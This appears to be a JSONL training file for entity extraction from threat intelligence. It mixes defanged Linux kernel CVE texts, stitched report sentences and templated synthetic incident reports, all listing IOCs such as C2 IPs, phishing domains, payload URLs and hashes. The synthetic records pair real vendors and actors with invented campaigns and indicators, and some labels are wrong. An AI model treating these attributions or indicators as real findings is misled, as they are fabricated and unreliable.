{"text": "Phishing Campaign Report: Qualys identified a large-scale phishing operation. Emails originated from confirm@credential-check[ . ]site and support@auth-check[ . ]org, spoofing legitimate services. Victims were directed to hxxps://apiportal[.]io/callback which hosted a credential harvesting page on relaycache[ . ]cc. A secondary link hxxps://cloud-sync[.]cc/callback delivered WarmCookie (MD5: ec8c039bc0befc1dc510b83101b923fe). The malware was saved to C:\\Users\\admin\\Desktop\\svchost.exe and established C2 with 132[.]219[.]227[.]160.", "spans": {"Organization: Qualys": [[26, 32]], "Indicator: confirm@credential-check.site": [[101, 134]], "Indicator: support@auth-check.org": [[139, 165]], "Indicator: hxxps://apiportal.io/callback": [[222, 253]], "Indicator: relaycache.cc": [[299, 316]], "Indicator: https://cloud-sync.cc/callback": [[335, 367]], "Malware: WarmCookie": [[378, 388]], "Indicator: ec8c039bc0befc1dc510b83101b923fe": [[395, 427]], "Indicator: 132.219.227.160": [[514, 535]]}, "info": {"id": "synth_v2_01009", "source": "defanged_augment"}}
{"text": "The blog post said HummingBad \" uses a completely different infrastructure with little in common '' with Shedun . simultaneous use of the detected Win32/KillDisk.NBO variants . APT33 : 5 [ . ] 187 [ . ] 21 [ . ] 71 backupnet[ . ]ddns[ . ]net . In some instances , two randomly generated bytes are added to the end of the file , which invalidates the detection of the dropped files using simple checksum - based techniques .", "spans": {"Malware: HummingBad": [[19, 29]], "Indicator: 5.187.21.71": [[185, 214]], "Indicator: backupnet.ddns.net": [[215, 241]]}, "info": {"id": "cyberner_stix_train_007719", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: Latrodectus (SHA1: 23c260a7e848094cdb5a4740aa502bba349d6152). Upon execution on Barracuda ESG, the sample creates C:\\Windows\\Temp\\runtime.dll and injects into legitimate processes. Network analysis shows beaconing to 116[.]80[.]110[.]245 every 60 seconds and DNS queries to gatewaysecure[ . ]cc. The second stage was fetched from hxxp://syncstorage[.]info/assets/js/payload.js and written to C:\\Users\\admin\\Desktop\\agent.py. The payload uses Ligolo-style techniques for defense evasion. A secondary hash (SHA1: b3af32d6ed30aaf46881333cf7c5f4557f5308c1) was extracted from the unpacked payload.", "spans": {"Malware: Latrodectus": [[25, 36]], "Indicator: 23c260a7e848094cdb5a4740aa502bba349d6152": [[44, 84]], "System: Barracuda ESG": [[105, 118]], "Indicator: 116.80.110.245": [[242, 262]], "Indicator: gatewaysecure.cc": [[299, 319]], "Indicator: hxxp://syncstorage.info/assets/js/payload.js": [[355, 401]], "Indicator: b3af32d6ed30aaf46881333cf7c5f4557f5308c1": [[536, 576]]}, "info": {"id": "synth_v2_00643", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/rxe: Return CQE error if invalid lkey was supplied\n\nRXE is missing update of WQE status in LOCAL_WRITE failures.  This caused\nthe following kernel panic if someone sent an atomic operation with an\nexplicitly wrong lkey.\n\n[leonro@vm ~]$ mkt test\ntest_atomic_invalid_lkey (tests.test_atomic.AtomicTest) ...\n WARNING: CPU: 5 PID: 263 at drivers/infiniband/sw/rxe/rxe_comp.c:740 rxe_completer+0x1a6d/0x2e30 [rdma_rxe]\n Modules linked in: crc32_generic rdma_rxe ip6_udp_tunnel udp_tunnel rdma_ucm rdma_cm ib_umad ib_ipoib iw_cm ib_cm mlx5_ib ib_uverbs ib_core mlx5_core ptp pps_core\n CPU: 5 PID: 263 Comm: python3 Not tainted 5.13.0-rc1+ #2936\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1[.]13[.]0-0-gf21b5a4aeb02-prebuilt[.]qemu[.]org 04/01/2014\n RIP: 0010:rxe_completer+0x1a6d/0x2e30 [rdma_rxe]\n Code: 03 0f 8e 65 0e 00 00 3b 93 10 06 00 00 0f 84 82 0a 00 00 4c 89 ff 4c 89 44 24 38 e8 2d 74 a9 e1 4c 8b 44 24 38 e9 1c f5 ff ff <0f> 0b e9 0c e8 ff ff b8 05 00 00 00 41 bf 05 00 00 00 e9 ab e7 ff\n RSP: 0018:ffff8880158af090 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: ffff888016a78000 RCX: ffffffffa0cf1652\n RDX: 1ffff9200004b442 RSI: 0000000000000004 RDI: ffffc9000025a210\n RBP: dffffc0000000000 R08: 00000000ffffffea R09: ffff88801617740b\n R10: ffffed1002c2ee81 R11: 0000000000000007 R12: ffff88800f3b63e8\n R13: ffff888016a78008 R14: ffffc9000025a180 R15: 000000000000000c\n FS:  00007f88b622a740(0000) GS:ffff88806d540000(0000) knlGS:0000000000000000\n CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 00007f88b5a1fa10 CR3: 000000000d848004 CR4: 0000000000370ea0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n Call Trace:\n  rxe_do_task+0x130/0x230 [rdma_rxe]\n  rxe_rcv+0xb11/0x1df0 [rdma_rxe]\n  rxe_loopback+0x157/0x1e0 [rdma_rxe]\n  rxe_responder+0x5532/0x7620 [rdma_rxe]\n  rxe_do_task+0x130/0x230 [rdma_rxe]\n  rxe_rcv+0x9c8/0x1df0 [rdma_rxe]\n  rxe_loopback+0x157/0x1e0 [rdma_rxe]\n  rxe_requester+0x1efd/0x58c0 [rdma_rxe]\n  rxe_do_task+0x130/0x230 [rdma_rxe]\n  rxe_post_send+0x998/0x1860 [rdma_rxe]\n  ib_uverbs_post_send+0xd5f/0x1220 [ib_uverbs]\n  ib_uverbs_write+0x847/0xc80 [ib_uverbs]\n  vfs_write+0x1c5/0x840\n  ksys_write+0x176/0x1d0\n  do_syscall_64+0x3f/0x80\n  entry_SYSCALL_64_after_hwframe+0x44/0xae", "spans": {"Indicator: rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org": [[771, 823]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[729, 733]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-47076"}}
{"text": "On Android , an Intent is a software mechanism that allows users to coordinate the functions of different Activities to achieve a task . This attack used the crisis in Syria as a lure to deliver malware to its targets . Suspicious attachment name: The name of attachment SHIPPING_MX00034900_PL_INV_pdf[.]zip ends with pdf[.]zip . The group appears to commonly deploy double extortion of the victims that have been listed on the leak site , several of them have had some portion of their exfiltrated data exposed .", "spans": {"System: Android": [[3, 10]], "Indicator: SHIPPING_MX00034900_PL_INV_pdf.zip": [[271, 307]], "Indicator: pdf.zip": [[318, 327]], "Organization: listed on the leak site": [[414, 437]]}, "info": {"id": "cyberner_stix_train_007536", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nregulator: core: Use different devices for resource allocation and DT lookup\n\nFollowing by the below discussion, there's the potential UAF issue\nbetween regulator and mfd.\nhxxps://lore[ . ]kernel[ . ]org/all/20221128143601.1698148-1-yangyingliang@huawei.com/\n\nFrom the analysis of Yingliang\n\nCPU A\t\t\t\t|CPU B\nmt6370_probe()\t\t\t|\n  devm_mfd_add_devices()\t|\n\t\t\t\t|mt6370_regulator_probe()\n\t\t\t\t|  regulator_register()\n\t\t\t\t|    //allocate init_data and add it to devres\n\t\t\t\t|    regulator_of_get_init_data()\ni2c_unregister_device()\t\t|\n  device_del()\t\t\t|\n    devres_release_all()\t|\n      // init_data is freed\t|\n      release_nodes()\t\t|\n\t\t\t\t|  // using init_data causes UAF\n\t\t\t\t|  regulator_register()\n\nIt's common to use mfd core to create child device for the regulator.\nIn order to do the DT lookup for init data, the child that registered\nthe regulator would pass its parent as the parameter. And this causes\ninit data resource allocated to its parent, not itself. The issue happen\nwhen parent device is going to release and regulator core is still doing\nsome operation of init data constraint for the regulator of child device.\n\nTo fix it, this patch expand 'regulator_register' API to use the\ndifferent devices for init data allocation and DT lookup.", "spans": {"Indicator: https://lore.kernel.org/all/20221128143601.1698148-1-yangyingliang@huawei.com/": [[241, 327]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-50616"}}
{"text": "TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can craft a TFLite model that would trigger a division by zero error in LSH [implementation](hxxps://github[.]com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/lite/kernels/lsh_projection.cc#L118). We have patched the issue in GitHub commit 0575b640091680cfb70f4dd93e70658de43b94f9. The fix will be included in TensorFlow 2.6.0. We will also cherrypick thiscommit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.", "spans": {"Indicator: https://github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/lite/kernels/lsh_projection.cc#L118": [[197, 332]], "Indicator: 0575b640091680cfb70f4dd93e70658de43b94f9": [[378, 418]], "Organization: GitHub": [[364, 370]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-37691"}}
{"text": "IOC Bulletin - BatLoader Campaign:\nNetwork Indicators:\n- 190[.]101[.]43[.]147\n- 58[.]29[.]177[.]42\n- 161 [ . ] 26 [ . ] 133 [ . ] 182\n- portal-cache[.]dev\n- secure-mail[.]live\nURLs:\n- hxxp://gateway-sync[ . ]org/login\n- hxxp://login-proxy[.]info/collect\nEmail Senders:\n- admin@secure-verify[ . ]net\n- verify@identity-verify[.]cc\nFile Indicators:\n- SHA1: 74806f38495308385f63bda18588e6bf028a278e\n- SHA1: 775c91a65ca47896e2c25c41b2732bcd3cf6022c\n- Drop path: /tmp/taskhost.exe", "spans": {"Malware: BatLoader": [[15, 24]], "Indicator: 190.101.43.147": [[57, 77]], "Indicator: 58.29.177.42": [[80, 98]], "Indicator: 161.26.133.182": [[101, 133]], "Indicator: portal-cache.dev": [[136, 154]], "Indicator: secure-mail.live": [[157, 175]], "Indicator: hxxp://gateway-sync.org/login": [[184, 217]], "Indicator: http://login-proxy.info/collect": [[220, 253]], "Indicator: admin@secure-verify.net": [[271, 298]], "Indicator: verify@identity-verify.cc": [[301, 328]], "Indicator: 74806f38495308385f63bda18588e6bf028a278e": [[354, 394]], "Indicator: 775c91a65ca47896e2c25c41b2732bcd3cf6022c": [[403, 443]]}, "info": {"id": "synth_v2_01464", "source": "defanged_augment"}}
{"text": "The most common way to achieve this is by creating a broadcast receiver that is registered to the “ android.intent.action.BOOT_COMPLETED ” broadcast action and adding code that boots the application when the broadcast is fired . Once in possession of compromised payment card credentials , these actors use tools commonly known as card generators to generate new card numbers based on the compromised ones , creating additional opportunities for monetization . The June 2017 sample of Clayslide contained the same OfficeServicesStatus[ . ]vbs file found in the ISMAgent Clayslide document , but instead of having the payload embedded in the macro as segregated base64 strings that would be concatenated , this variant obtained its payload from multiple cells within the \" Incompatible \" worksheet .", "spans": {"Malware: Clayslide": [[485, 494]], "Indicator: OfficeServicesStatus.vbs file": [[514, 547]], "Malware: ISMAgent Clayslide document": [[561, 588]]}, "info": {"id": "cyberner_stix_train_000892", "source": "defanged_augment"}}
{"text": "Artifact Analysis for DarkSide campaign:\nStage 1 dropper at /tmp/agent.py - MD5: f0f77ea05d2a1f62324f3887124b3da2\nStage 2 loader at /etc/cron.d/shell.php - SHA256: bc652e95557574acb820d000c13f163fe2d31e3f599f29dcc88035ac59e06df3\nFinal payload at /etc/cron.d/dropper.ps1 - SHA256: cad0ed1f0267d5090a29b1d1a8e4a0bbdd64618c5165113038fe2bfc893d5a12\nExfiltration module - SHA256: 301d396ee37111ccad8d5b5c79ef76603c403e17bd29a0737828ac04af75386c\nAll stages communicated with 102[.]179[.]203[.]41. Sharphound signatures detected in Stage 2.", "spans": {"Malware: DarkSide": [[22, 30]], "Indicator: f0f77ea05d2a1f62324f3887124b3da2": [[81, 113]], "Indicator: bc652e95557574acb820d000c13f163fe2d31e3f599f29dcc88035ac59e06df3": [[164, 228]], "Indicator: cad0ed1f0267d5090a29b1d1a8e4a0bbdd64618c5165113038fe2bfc893d5a12": [[280, 344]], "Indicator: 301d396ee37111ccad8d5b5c79ef76603c403e17bd29a0737828ac04af75386c": [[375, 439]], "Indicator: 102.179.203.41": [[469, 489]]}, "info": {"id": "synth_v2_01893", "source": "defanged_augment"}}
{"text": "CISA published a threat intelligence report linking Granite Typhoon to a new campaign exploiting CVE-2020-15697 in Atlassian Confluence. The attackers deployed Qbot via Chisel, establishing C2 communication with 10[.]28[.]136[.]199 and portalupdate[ . ]net. A secondary payload was downloaded from hxxps://portal-relay[.]xyz/wp-content/uploads/doc.php. The malware binary (MD5: be1a85f332c58d19463bb6b892fb4088) was dropped to C:\\Users\\Public\\Documents\\loader.exe. Phishing emails were sent from billing@credential-check[.]site targeting enterprise users. A backup C2 server was identified at 19[.]240[.]92[.]50.", "spans": {"Organization: CISA": [[0, 4]], "Vulnerability: CVE-2020-15697": [[97, 111]], "System: Atlassian Confluence": [[115, 135]], "Malware: Qbot": [[160, 164]], "Indicator: 10.28.136.199": [[212, 231]], "Indicator: portalupdate.net": [[236, 256]], "Indicator: hxxps://portal-relay.xyz/wp-content/uploads/doc.php": [[298, 351]], "Indicator: be1a85f332c58d19463bb6b892fb4088": [[378, 410]], "Indicator: billing@credential-check.site": [[496, 527]], "Indicator: 19.240.92.50": [[593, 611]]}, "info": {"id": "synth_v2_00177", "source": "defanged_augment"}}
{"text": "] top/ Oct 17 , 2017 hxxp : //online[ . ]bankaustria[ . ]at.id58729 [ . In addition to the MitM server IP addresses published in previous reports , Talos identified 16 additional servers leveraged by the actor during the observed attacks . APT28 : SNAKEMACKEREL , Swallowtail , Group 74 , Sednit , Sofacy , Pawn Storm , Fancy Bear , STRONTIUM , Tsar Team , Threat Group-4127 , TG-4127 .", "spans": {"Organization: Talos": [[148, 153]], "Indicator: online.bankaustria.at": [[30, 59]]}, "info": {"id": "cyberner_stix_train_004073", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 172 [ . ] 8 [ . ] 254 [ . ] 187, the NCSC IR team identified SystemBC running as /home/user/.config/winlogon.exe. The threat actor, believed to be Ember Bear, used Burp Suite for credential harvesting and Merlin for lateral movement. Exfiltrated data was sent to portal-data[ . ]online and proxycache[.]net. The initial dropper (SHA256: df7070f3461f6799941c50ab4a721fe0c840202fc59d3ed525100a9ec3e57de1) was delivered via a phishing email from security@login-portal[ . ]tech. A second C2 node was observed at 96[.]55[.]231[.]58, with a persistence mechanism writing to C:\\Windows\\System32\\chrome_helper.exe.", "spans": {"Indicator: 172.8.254.187": [[64, 95]], "Organization: NCSC": [[101, 105]], "Malware: SystemBC": [[125, 133]], "Indicator: portal-data.online": [[327, 349]], "Indicator: proxycache.net": [[354, 370]], "Indicator: df7070f3461f6799941c50ab4a721fe0c840202fc59d3ed525100a9ec3e57de1": [[401, 465]], "Indicator: security@login-portal.tech": [[507, 537]], "Indicator: 96.55.231.58": [[572, 590]]}, "info": {"id": "synth_v2_00438", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 192[.]148[.]215[.]55, the Kaspersky GReAT IR team identified Ryuk running as /etc/cron.d/helper.sh. The threat actor, believed to be UNC2452, used Brute Ratel for credential harvesting and LaZagne for lateral movement. Exfiltrated data was sent to authmail[.]link and gatewayportal[.]com. The initial dropper (SHA1: 5f337b3ba854942d50d056f701abfa4e6cbc76fb) was delivered via a phishing email from finance@identity-verify[.]cc. A second C2 node was observed at 172 [ . ] 195 [ . ] 58 [ . ] 51, with a persistence mechanism writing to /home/user/.config/backdoor.elf.", "spans": {"Indicator: 192.148.215.55": [[64, 84]], "Organization: Kaspersky GReAT": [[90, 105]], "Malware: Ryuk": [[125, 129]], "Indicator: authmail.link": [[312, 327]], "Indicator: gatewayportal.com": [[332, 351]], "Indicator: 5f337b3ba854942d50d056f701abfa4e6cbc76fb": [[380, 420]], "Indicator: finance@identity-verify.cc": [[462, 490]], "Indicator: 172.195.58.51": [[525, 556]]}, "info": {"id": "synth_v2_00379", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: brcmfmac: Check the count value of channel spec to prevent out-of-bounds reads\n\nThis patch fixes slab-out-of-bounds reads in brcmfmac that occur in\nbrcmf_construct_chaninfo() and brcmf_enable_bw40_2g() when the count\nvalue of channel specifications provided by the device is greater than\nthe length of 'list->element[]', decided by the size of the 'list'\nallocated with kzalloc(). The patch adds checks that make the functions\nfree the buffer and return -EINVAL if that is the case. Note that the\nnegative return is handled by the caller, brcmf_setup_wiphybands() or\nbrcmf_cfg80211_attach().\n\nFound by a modified version of syzkaller.\n\nCrash Report from brcmf_construct_chaninfo():\n==================================================================\nBUG: KASAN: slab-out-of-bounds in brcmf_setup_wiphybands+0x1238/0x1430\nRead of size 4 at addr ffff888115f24600 by task kworker/0:2/1896\n\nCPU: 0 PID: 1896 Comm: kworker/0:2 Tainted: G        W  O      5.14.0+ #132\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1[ . ]12[ . ]1-0-ga5cab58e9a3f-prebuilt[ . ]qemu[ . ]org 04/01/2014\nWorkqueue: usb_hub_wq hub_event\nCall Trace:\n dump_stack_lvl+0x57/0x7d\n print_address_description.constprop.0.cold+0x93/0x334\n kasan_report.cold+0x83/0xdf\n brcmf_setup_wiphybands+0x1238/0x1430\n brcmf_cfg80211_attach+0x2118/0x3fd0\n brcmf_attach+0x389/0xd40\n brcmf_usb_probe+0x12de/0x1690\n usb_probe_interface+0x25f/0x710\n really_probe+0x1be/0xa90\n __driver_probe_device+0x2ab/0x460\n driver_probe_device+0x49/0x120\n __device_attach_driver+0x18a/0x250\n bus_for_each_drv+0x123/0x1a0\n __device_attach+0x207/0x330\n bus_probe_device+0x1a2/0x260\n device_add+0xa61/0x1ce0\n usb_set_configuration+0x984/0x1770\n usb_generic_driver_probe+0x69/0x90\n usb_probe_device+0x9c/0x220\n really_probe+0x1be/0xa90\n __driver_probe_device+0x2ab/0x460\n driver_probe_device+0x49/0x120\n __device_attach_driver+0x18a/0x250\n bus_for_each_drv+0x123/0x1a0\n __device_attach+0x207/0x330\n bus_probe_device+0x1a2/0x260\n device_add+0xa61/0x1ce0\n usb_new_device.cold+0x463/0xf66\n hub_event+0x10d5/0x3330\n process_one_work+0x873/0x13e0\n worker_thread+0x8b/0xd10\n kthread+0x379/0x450\n ret_from_fork+0x1f/0x30\n\nAllocated by task 1896:\n kasan_save_stack+0x1b/0x40\n __kasan_kmalloc+0x7c/0x90\n kmem_cache_alloc_trace+0x19e/0x330\n brcmf_setup_wiphybands+0x290/0x1430\n brcmf_cfg80211_attach+0x2118/0x3fd0\n brcmf_attach+0x389/0xd40\n brcmf_usb_probe+0x12de/0x1690\n usb_probe_interface+0x25f/0x710\n really_probe+0x1be/0xa90\n __driver_probe_device+0x2ab/0x460\n driver_probe_device+0x49/0x120\n __device_attach_driver+0x18a/0x250\n bus_for_each_drv+0x123/0x1a0\n __device_attach+0x207/0x330\n bus_probe_device+0x1a2/0x260\n device_add+0xa61/0x1ce0\n usb_set_configuration+0x984/0x1770\n usb_generic_driver_probe+0x69/0x90\n usb_probe_device+0x9c/0x220\n really_probe+0x1be/0xa90\n __driver_probe_device+0x2ab/0x460\n driver_probe_device+0x49/0x120\n __device_attach_driver+0x18a/0x250\n bus_for_each_drv+0x123/0x1a0\n __device_attach+0x207/0x330\n bus_probe_device+0x1a2/0x260\n device_add+0xa61/0x1ce0\n usb_new_device.cold+0x463/0xf66\n hub_event+0x10d5/0x3330\n process_one_work+0x873/0x13e0\n worker_thread+0x8b/0xd10\n kthread+0x379/0x450\n ret_from_fork+0x1f/0x30\n\nThe buggy address belongs to the object at ffff888115f24000\n which belongs to the cache kmalloc-2k of size 2048\nThe buggy address is located 1536 bytes inside of\n 2048-byte region [ffff888115f24000, ffff888115f24800)\n\nMemory state around the buggy address:\n ffff888115f24500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n ffff888115f24580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n>ffff888115f24600: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc\n                   ^\n ffff888115f24680: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc\n ffff888115f24700: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc\n==================================================================\n\nCrash Report from brcmf_enable_bw40_2g():\n==========\n---truncated---", "spans": {"Indicator: rel-1.12.1-0-ga5cab58e9a3f-prebuilt.qemu.org": [[1097, 1157]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[1052, 1056]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-49740"}}
{"text": "Phishing Campaign Report: CrowdStrike identified a large-scale phishing operation. Emails originated from support@account-update[.]xyz and security@urgent-notice[.]online, spoofing legitimate services. Victims were directed to hxxp://gatewayportal[ . ]tech/gate.php which hosted a credential harvesting page on static-data[ . ]com. A secondary link hxxp://securecloud[.]xyz/panel/index.html delivered BlackCat (SHA256: d4e94b5bb47ac248ee00c635a052cdf8471ecc1f12918a4cc9baa32a0e3ea780). The malware was saved to /opt/app/bin/lsass.dmp and established C2 with 10[.]104[.]5[.]59.", "spans": {"Organization: CrowdStrike": [[26, 37]], "Indicator: support@account-update.xyz": [[106, 134]], "Indicator: security@urgent-notice.online": [[139, 170]], "Indicator: hxxp://gatewayportal.tech/gate.php": [[227, 265]], "Indicator: static-data.com": [[311, 330]], "Indicator: hxxp://securecloud.xyz/panel/index.html": [[349, 390]], "Malware: BlackCat": [[401, 409]], "Indicator: d4e94b5bb47ac248ee00c635a052cdf8471ecc1f12918a4cc9baa32a0e3ea780": [[419, 483]], "Indicator: 10.104.5.59": [[558, 575]]}, "info": {"id": "synth_v2_00856", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 10[.]226[.]184[.]135, the Secureworks IR team identified Raccoon Stealer running as /usr/local/bin/beacon.dll. The threat actor, believed to be BlackTech, used Rubeus for credential harvesting and Merlin for lateral movement. Exfiltrated data was sent to syncnode[.]dev and static-sync[.]com. The initial dropper (SHA1: 8cbf60f27f705c029084d8b3a47798af9a1e3ea3) was delivered via a phishing email from hr@mail-service[ . ]info. A second C2 node was observed at 10 [ . ] 158 [ . ] 168 [ . ] 25, with a persistence mechanism writing to C:\\Users\\admin\\Desktop\\update.dll.", "spans": {"Indicator: 10.226.184.135": [[64, 84]], "Organization: Secureworks": [[90, 101]], "Malware: Raccoon Stealer": [[121, 136]], "Indicator: syncnode.dev": [[319, 333]], "Indicator: static-sync.com": [[338, 355]], "Indicator: 8cbf60f27f705c029084d8b3a47798af9a1e3ea3": [[384, 424]], "Indicator: hr@mail-service.info": [[466, 490]], "Indicator: 10.158.168.25": [[525, 556]]}, "info": {"id": "synth_v2_00446", "source": "defanged_augment"}}
{"text": "android.media.RINGER_MODE_CHANGED android.sms.msg.action.SMS_SEND android.sms.msg.action.SMS_DELIVERED Creating a Web Server to Phish XLoader creates a provisional web server to receive the broadcast events . From the attack activity captured this time , it is obvious that Donot APT group is still keen on Pakistan as primary target of attack , and even expands scope of attack to include Pakistani staffs and institutions in China . The script is quite different from the previous one : it guarantees its persistence on the victim machine through the setting of “ HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run ” registry key , creating a new entry named “ Windows Anytime Upgrade ” which points to “ winserv[ . ]exe ” , just stored into the same folder .", "spans": {"Malware: XLoader": [[134, 141]], "System: Windows": [[663, 670]], "Indicator: winserv.exe": [[707, 722]]}, "info": {"id": "cyberner_stix_train_006398", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: ShadowPad (SHA256: 7304c425d49a8e5e315daa4d88d2974f92112722312a3522a9fb38d862025223). Upon execution on Fortinet FortiGate, the sample creates /usr/local/bin/dropper.ps1 and injects into legitimate processes. Network analysis shows beaconing to 154 [ . ] 138 [ . ] 252 [ . ] 162 every 60 seconds and DNS queries to storage-node[.]online. The second stage was fetched from hxxp://backupsync[.]live/secure/token and written to /home/user/.config/sam.hive. The payload uses Metasploit-style techniques for defense evasion. A secondary hash (MD5: fccefff77d0b9b5868617ca508e5e143) was extracted from the unpacked payload.", "spans": {"Malware: ShadowPad": [[25, 34]], "Indicator: 7304c425d49a8e5e315daa4d88d2974f92112722312a3522a9fb38d862025223": [[44, 108]], "System: Fortinet FortiGate": [[129, 147]], "Indicator: 154.138.252.162": [[270, 303]], "Indicator: storage-node.online": [[340, 361]], "Indicator: hxxp://backupsync.live/secure/token": [[397, 434]], "Indicator: fccefff77d0b9b5868617ca508e5e143": [[568, 600]]}, "info": {"id": "synth_v2_00481", "source": "defanged_augment"}}
{"text": "Qualys published a threat intelligence report linking Aqua Blizzard to a new campaign exploiting CVE-2023-39714 in Microsoft Exchange. The attackers deployed XLoader via LinPEAS, establishing C2 communication with 112 [ . ] 113 [ . ] 76 [ . ] 234 and nodecdn[.]site. A secondary payload was downloaded from hxxp://proxyauth[.]online/wp-content/uploads/doc.php. The malware binary (SHA256: ff1c5da8010ed28cff28c306aef9983ad9d4349ef391d47cb05d5140387e024e) was dropped to C:\\Windows\\Temp\\ntds.dit. Phishing emails were sent from billing@account-update[ . ]xyz targeting enterprise users. A backup C2 server was identified at 172[.]22[.]20[.]254.", "spans": {"Organization: Qualys": [[0, 6]], "Vulnerability: CVE-2023-39714": [[97, 111]], "System: Microsoft Exchange": [[115, 133]], "Malware: XLoader": [[158, 165]], "Indicator: 112.113.76.234": [[214, 246]], "Indicator: nodecdn.site": [[251, 265]], "Indicator: http://proxyauth.online/wp-content/uploads/doc.php": [[307, 359]], "Indicator: ff1c5da8010ed28cff28c306aef9983ad9d4349ef391d47cb05d5140387e024e": [[389, 453]], "Indicator: billing@account-update.xyz": [[527, 557]], "Indicator: 172.22.20.254": [[623, 642]]}, "info": {"id": "synth_v2_00230", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Backdoor.Win32.Noobot!O Backdoor.Poftsyun Backdoor.W32.Noobot.h!c Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan.Ecltys Backdoor.Win32.Noobot.h Trojan.Win32.Noobot.ylgzy Backdoor.Win32.A.Noobot.158756 Backdoor.Noobot.Win32.6 BehavesLike[ . ]Win32[ . ]Downloader[ . ]ch Backdoor.Win32.Ecltys W32/Trojan.SKHW-8707 Backdoor/Noobot.d BDS/Noobot.A.14 Backdoor:Win32/Poftsyun.A Backdoor.Win32.Noobot.h Trojan/Win32.Noobot.R214072 Backdoor.Noobot Trojan.Zusy.D49A6 Win32.Backdoor.Noobot.Pfts Backdoor.Noobot!KDSSDgztHWQ W32/Noobot.H!tr.bdr Win32/Trojan.231", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Downloader.ch": [[254, 297]]}, "info": {"id": "cyner2_train_001028", "source": "defanged_augment"}}
{"text": "Check Point Research published a threat intelligence report linking OilRig to a new campaign exploiting CVE-2024-19363 in Ivanti Connect Secure. The attackers deployed DarkSide via Ligolo, establishing C2 communication with 192[.]128[.]192[.]250 and proxyproxy[.]dev. A secondary payload was downloaded from hxxp://node-login[ . ]online/wp-content/uploads/doc.php. The malware binary (SHA256: 284667f1a0446fec040f50af7ee6d6a926c3e3b66cd09a7793292556ba17686d) was dropped to /usr/local/bin/runtime.dll. Phishing emails were sent from noreply@account-update[ . ]xyz targeting enterprise users. A backup C2 server was identified at 192[.]207[.]180[.]210.", "spans": {"Organization: Check Point Research": [[0, 20]], "Vulnerability: CVE-2024-19363": [[104, 118]], "System: Ivanti Connect Secure": [[122, 143]], "Malware: DarkSide": [[168, 176]], "Indicator: 192.128.192.250": [[224, 245]], "Indicator: proxyproxy.dev": [[250, 266]], "Indicator: hxxp://node-login.online/wp-content/uploads/doc.php": [[308, 363]], "Indicator: 284667f1a0446fec040f50af7ee6d6a926c3e3b66cd09a7793292556ba17686d": [[393, 457]], "Indicator: noreply@account-update.xyz": [[533, 563]], "Indicator: 192.207.180.210": [[629, 650]]}, "info": {"id": "synth_v2_00156", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Cisco Talos identified a large-scale phishing operation. Emails originated from support@secure-verify[.]net and report@login-portal[ . ]tech, spoofing legitimate services. Victims were directed to hxxps://backupstorage[ . ]link/wp-content/uploads/doc.php which hosted a credential harvesting page on static-cloud[.]link. A secondary link hxxps://cachenode[.]live/assets/js/payload.js delivered BumbleBee (SHA256: 0574fd3a2e0b3bc4c0c82818840f9035ce431741791294da0f80cf914632a80c). The malware was saved to /home/user/.config/helper.sh and established C2 with 42 [ . ] 218 [ . ] 67 [ . ] 2.", "spans": {"Organization: Cisco Talos": [[26, 37]], "Indicator: support@secure-verify.net": [[106, 133]], "Indicator: report@login-portal.tech": [[138, 166]], "Indicator: hxxps://backupstorage.link/wp-content/uploads/doc.php": [[223, 280]], "Indicator: static-cloud.link": [[326, 345]], "Indicator: https://cachenode.live/assets/js/payload.js": [[364, 409]], "Malware: BumbleBee": [[420, 429]], "Indicator: 0574fd3a2e0b3bc4c0c82818840f9035ce431741791294da0f80cf914632a80c": [[439, 503]], "Indicator: 42.218.67.2": [[584, 613]]}, "info": {"id": "synth_v2_00947", "source": "defanged_augment"}}
{"text": "Many of the strings in the application are XOR 'd with the key Kjk1MmphFG : After some additional requests , the dropper made a POST request to https : //54[.]71[.]249[.]137/56e087c9-fc56-49bb-bbd0-4fafc4acd6e1 which returned a zip file containing the second stage binaries .", "spans": {"Indicator: 54.71.249.137": [[154, 173]]}, "info": {"id": "cyner_train_001217", "source": "defanged_augment"}}
